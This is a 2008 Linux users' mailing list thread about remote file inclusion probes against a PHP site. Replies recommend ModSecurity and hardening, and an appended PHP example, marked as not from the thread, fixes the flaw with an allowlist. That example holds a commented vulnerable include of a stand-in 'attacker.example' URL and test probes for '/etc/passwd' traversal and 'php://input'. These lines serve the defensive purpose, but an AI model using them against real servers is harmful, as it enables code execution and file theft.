ModSecurity used to terminally slow down web systems adding a great deal of load while actually doing little denial and only verbose exploit logging assistance in return, while also opening the system to additional Denial of Service threat conditions.
THIS HAS CHANGED, however there are still some risks to flat implementation of ModSecurity.  For instance, you can't really layer good engineering over bad and expect miracles?
ModSecurity Limitations and Caveats:
1) Stateful Request Monitoring - Layer 7 Application Firewall

http://www.modsecurity.org/
http://adeptus-mechanicus.com/codex/apchems/apchems.html
Don't try to run anything but the current versions due to known security risks!
2) Capacity Planning
But beware before playing with modsecurity!
ModSecurity can be exploited itself - since it's easy to DoS, and slows down requests, however if you have the processing power, use ModEvasive protection also:
http://adeptus-mechanicus.com/codex/apcheme/apcheme.html
http://www.associatedcontent.com/article/6379/about_modsecurity_and_moddosevasive.html
3) Of course a fine Reverse Proxy security setup might also be fun!  You have a test network right?
http://linuxadministration.wordpress.com/2007/09/06/advance-apache-security-mod_proxymod_securitymod_evasive/
4) A complete security appraisal of your current index.php, CMS version, Php.ini and Apache version would be in order. 

Do you KNOW the exploits currently available for your system?  I.E. Are you running Joomla, Web 2.0, Mambo or another CMS drop and deploy application?
Each item, from your kernel, your SSL, Apache, MySQL version and each PHP tool built upon it, has its known security holes.  A savvy security systems administrator might do well to know each and play for upgrades or layered tools to mitigate the risk.
Are you using a custom web development binary, or a drop in yum Apache/Php for instance?  Various known issues exist with versions configured right out of the box; what hardening was completed?

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis | http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452

Catch the January PLUG HackFest!   Kristy Westphal, CSO for the Arizona Department of Economic Security will provide a one hour presentation on forensics.

Date: Wed, 3 Dec 2008 15:48:17 -0700
From: jd@twingeckos.com
To: klsmith2020@yahoo.com; plug-discuss@lists.plug.phoenix.az.us
Subject: Re: OT: Website Exploits

That is a fairly common tactic. 
It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using apache?)
as an extra measure of security if you haven't already.


On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020@yahoo.com> wrote:

Hi,

I am working on a website that gets a lot of exploit attempts.

They mostly look like this:  /index.php?display=http://humano.ya.com/mysons/index.htm?

Our code is set to disregard any value that is not expected. 

I'm wondering if there is a clearing house for reporting this type of stuff.  I have the IP address as reported.... if that is accurate.

Thanks in advance!

Keith
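The request Keith quotes (`/index.php?display=http://humano.ya.com/mysons/index.htm?`) is a remote file inclusion probe: it only works when the script hands the raw `display` value to `include`. The example below is added to this thread and is not code from any of the posters; it assumes a hypothetical `index.php` that loads page fragments from a `pages/` directory and a parameter named `display`. It shows the vulnerable pattern in a comment beside an allowlist version that does what Keith describes ("disregard any value that is not expected"), and runs a self-check when executed from the command line.

```php
<?php
// Added example (not from the thread). Hypothetical layout: index.php loads
// a fragment from ./pages/<name>.php selected by the ?display= parameter.

// --- Vulnerable pattern (do not deploy) ---------------------------------
// With register_globals=On (removed in PHP 5.4) or a naive read of $_GET,
// and allow_url_include=On, the attacker chooses what gets included:
//
//     include($display);   // $display = "http://attacker.example/x.txt"
//
// PHP fetches the remote file and executes it as code on the server.
// Keep allow_url_include=Off in php.ini as a second line of defence.

// --- Hardened version: map the value to a known file, never use it raw ---
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Resolve the untrusted ?display= value to a local file path, or null.
 * Only exact allowlist matches are accepted; URLs, "../" sequences,
 * NUL bytes and stream wrappers (php://, data://) never reach include().
 */
function resolve_page(?string $requested): ?string
{
    if ($requested === null) {
        return __DIR__ . '/pages/home.php';          // default page
    }
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;                                  // unexpected: discard
    }
    return __DIR__ . '/pages/' . $requested . '.php';
}

// Self-check when run as `php index.php` from a shell (no web request).
if (PHP_SAPI === 'cli') {
    // Constructed inputs: the probe from the thread plus a few variants.
    $probes = [
        'http://humano.ya.com/mysons/index.htm?',
        '../../../../etc/passwd',
        "home\0.txt",
        'php://input',
    ];
    foreach ($probes as $p) {
        assert(resolve_page($p) === null, "should reject: $p");
    }
    assert(resolve_page('about') === __DIR__ . '/pages/about.php');
    assert(resolve_page(null) === __DIR__ . '/pages/home.php');
    echo "allowlist checks passed\n";
    exit(0);
}

// Web entry point: read $_GET explicitly; never rely on register_globals.
$page = resolve_page($_GET['display'] ?? null);
if ($page === null) {
    http_response_code(404);
    // Log the rejected value so probes show up in the error log.
    error_log('Rejected display parameter: ' . ($_GET['display'] ?? ''));
    exit;
}
include $page;
```

The point of the allowlist is that the parameter is only ever compared against known names and then used to build a path the script controls; the attacker-supplied string itself is never passed to `include`, so neither remote URLs nor directory traversal have anything to act on. Logging the rejected value (as the web branch does) gives the kind of exploit-attempt record Keith is already seeing, without needing an external clearing house to make it useful locally.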




---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss